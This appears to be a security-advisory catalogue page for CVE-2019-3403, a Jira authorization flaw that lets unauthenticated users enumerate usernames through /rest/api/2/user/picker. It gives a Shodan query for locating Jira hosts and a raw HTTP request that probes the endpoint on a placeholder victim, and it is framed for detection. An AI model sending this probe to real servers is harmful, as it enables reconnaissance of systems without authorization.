🔙 목록으로 돌아가기

CVE-2019-3403: Jira - Incorrect Authorization

TitleJira - Incorrect Authorization
AuthorGanofins
SeverityMedium
ImpactThis vulnerability can lead to unauthorized access to sensitive data, potential data breaches, and unauthorized actions within the Jira system.
RemediationApply the latest security patches and updates provided by Atlassian to fix the vulnerability and ensure proper authorization controls are in place.
CVSS Score5.3
EPSS Score0.828
CVE IDCVE-2019-3403
CWE IDCWE-863
Shodan Queryhttp.component:"Atlassian Jira"http.component:"atlassian jira"http.component:"atlassian confluence"cpe:"cpe:2.3:a:atlassian:jira"
Tags cve cve2019 atlassian jira enumeration vuln

🔍 Vulnerability Description

Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker rest resource, enabling an attacker to enumerate usernames and gain improper access.

🌐 HTTP Request

GET /rest/api/2/user/picker?query HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-3403.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-3403.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A